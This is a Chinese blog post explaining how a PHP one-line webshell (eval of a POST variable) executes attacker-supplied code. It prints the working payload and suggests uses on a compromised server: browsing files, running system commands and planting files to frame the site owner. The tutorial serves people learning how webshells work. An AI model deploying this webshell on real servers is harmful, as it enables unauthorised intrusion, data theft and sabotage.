在很多的滲透過程中，滲透人員會上傳一句話木馬（簡稱webshell）到目前web服務目錄繼而提權獲取系統權限，不論asp、php、jsp、aspx都是如此，那麽一句話木馬到底是如何執行的呢，下面我們就對webshell進行一個簡單的分析。

首先我們先看一個原始而又簡單的php一句話木馬。

<?php @eval($_POST[‘cmd‘]); ?>

看到這裏不得不贊美前輩的智慧。

對於一個稍微懂一些php的人而言，或者初級的安全愛好者，或者腳本小子而言，看到的第一眼就是密碼是cmd，通過post提交數據，但是具體如何執行的，卻不得而知，下面我們分析一句話是如何執行的。

這句話什麽意思呢？

php的代碼要寫在<?php ?>裏面，服務器才能認出來這是php代碼，然後才去解析。

@符號的意思是不報錯。

例如：

如果沒有@，如下圖，就會報錯

為什麽呢？

因為一個變量沒有定義，就被拿去使用了，

服務器就善意的提醒：Notice，你的xxx變量沒有定義。

這不就暴露了密碼嗎？

所以加上@

為什麽pw是密碼呢？

那就要來理解這句話的意思了

php裏面幾個超全局變量

$_GET、$_POST就是其中之一

$_POST[‘a‘];

意思就是a這個變量，用post的方法接收。

（傳輸數據的兩種方法，get、post，post是在消息體存放數據，get是在消息頭的url路徑裏存放數據（例如xxx.php?a=2））

eval()

把字符串作為PHP代碼執行

例如：eval("echo ‘a‘");其實就等於直接 echo ‘a‘;

再來看看<?php eval($_POST[‘pw‘]); ?>

首先，用post方式接收變量pw，比如接收到了：pw=echo ‘a‘;

這時代碼就變成<?php eval("echo ‘a‘;"); ?>

結果：

連起來意思就是：

用post方法接收變量pw,把變量pw裏面的字符串當做php代碼來執行

所以也就能這麽玩：

也就是說，你想執行什麽代碼，就把什麽代碼放進變量pw裏，用post傳輸給一句話木馬

你想查看目標硬盤裏有沒有小黃片，可以用php函數：opendir()和readdir()等等

想上傳點小黃片，誣陷站主，就用php函數：move_uploaded_file，當然相應的html要寫好

你想執行cmd命令，則用exec()

當然前提是：

php配置文件php.ini裏，關掉安全模式safe_mode = off，

然後在看看 禁用函數列表 disable_functions = proc_open, popen, exec, system, shell_exec ，把exec去掉，確保沒有exec。

（有些cms為了方便處理某些功能，會去掉的）

看看效果：

現在應該理解，為什麽說一句話短小精悍了吧！

我們在看一下一句話在菜刀之類的webshell管理工具裏面是如何一句話是如何執行的

其實可以很明顯看明白，其實執行的命令就和我們前面寫的哪樣進行輸入輸出，執行系統命令操作。

所以只要webshell有足夠高的權限，可以做任何你想做的事情。

本文出自 “tar0cisp” 博客，請務必保留此出處http://tar0cisp.blog.51cto.com/6253667/1937364

一句話木馬（webshell）是如何執行命令的